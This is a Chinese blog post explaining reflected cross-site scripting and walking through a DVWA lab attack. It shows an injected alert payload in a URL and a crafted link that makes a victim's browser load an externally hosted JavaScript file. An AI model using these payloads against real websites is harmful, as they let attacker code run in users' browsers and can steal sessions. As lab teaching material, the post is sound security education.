XSS攻击介绍

Posted 测试开发者部落

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS攻击介绍相关的知识,希望对你有一定的参考价值。

XSS(Reflected)原理

非持久型(反射型)跨站脚本漏洞是最基本的web漏洞。当web客户端提供数据时,就会出现这种漏洞,常见于HTTP查询参数(例如,html表单提交),服务端脚本在没有正确过滤请求时,就立即解析并展示页面结果给用户。
因为html文档是流式结构并且混合了控制状态,格式化,真实内容,结果页面中包含的任何未经验证的用户提交数据,如果没有正确的进行html编码,都有可能导致标签注入。一个典型例子是一个网站搜索引擎:如果搜索了一个字符串,这个搜索字符串通常会在搜索页再显示一次,告诉用户搜索了什么。如果响应没有正确忽略或者拒绝html控制字符串,跨站脚本风险随之而来。
一次反射型攻击通常通过邮件或者中立的站点来实施。诱饵通常是一个看起来安全的url,指向一个受信任的站点,但是包含XSS载体。如果受信任的站点容易受到载体影响,点击这个链接可能会导致受害者的浏览器执行注入脚本。

参考资料

https://www.jianshu.com/p/63b3913dea68
https://www.jianshu.com/p/ce8e294b1912

思路

1)检查网站是否存在XSS(Reflected)漏洞
2)如果存在XSS(Reflected)漏洞,则进行XSS(Reflected)攻击

具体步骤

文本输入框里面注入包含JS脚本的字符串并执行提交

image.png

抓到的请求地址如下:


http://192.168.0.131:8090/dvwa/vulnerabilities/xss_r/?name=aliyun<script>alert("hack")</script>

设计JS脚本

JS代码如下:

alert("哈哈哈!你被黑了!");

发送一个链接给用户

http://192.168.0.131:8090/dvwa/vulnerabilities/xss_r/?name=aliyun<script src="http://192.168.0.131:8020/test/js/demo.js" charset="utf-8"></script>

登录状态下的用户点击该链接

结果如下:

image.png


以上是关于XSS攻击介绍的主要内容,如果未能解决你的问题,请参考以下文章

第二百六十五节,xss脚本攻击介绍

XSS 漏洞介绍

Xss和Csrf介绍

SpringBoot 如何防护 XSS 攻击 ??

XSS基础学习

通过脚本片段绕过XSS防御